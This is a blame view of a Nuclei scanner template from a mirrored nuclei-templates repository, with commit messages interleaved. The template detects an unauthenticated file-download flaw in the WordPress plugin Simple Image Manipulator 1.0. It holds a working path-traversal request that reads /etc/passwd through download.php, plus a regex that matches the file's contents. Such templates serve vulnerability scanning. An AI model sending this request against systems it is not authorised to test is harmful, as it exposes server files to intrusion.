daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/wordpress/simple-image-manipulator-lf...

26 lines
766 B
YAML
Raw Normal View History

Update and rename wp-simple-image-manipulator-lfi.yaml to simple-image-manipulator-lfi.yaml
2022-02-15 11:56:32 +00:00
id: simple-image-manipulator-lfi
Create wp-simple-image-manipulator-lfi.yaml
2022-02-12 18:14:11 +00:00
info:
Update and rename wp-simple-image-manipulator-lfi.yaml to simple-image-manipulator-lfi.yaml
2022-02-15 11:56:32 +00:00
name: Simple Image Manipulator v1.0 - Remote file download
Create wp-simple-image-manipulator-lfi.yaml
2022-02-12 18:14:11 +00:00
author: dhiyaneshDK
severity: high
description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
reference:
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
Update and rename wp-simple-image-manipulator-lfi.yaml to simple-image-manipulator-lfi.yaml
2022-02-15 11:56:32 +00:00
tags: wordpress,wp-plugin,lfi,wp
Create wp-simple-image-manipulator-lfi.yaml
2022-02-12 18:14:11 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200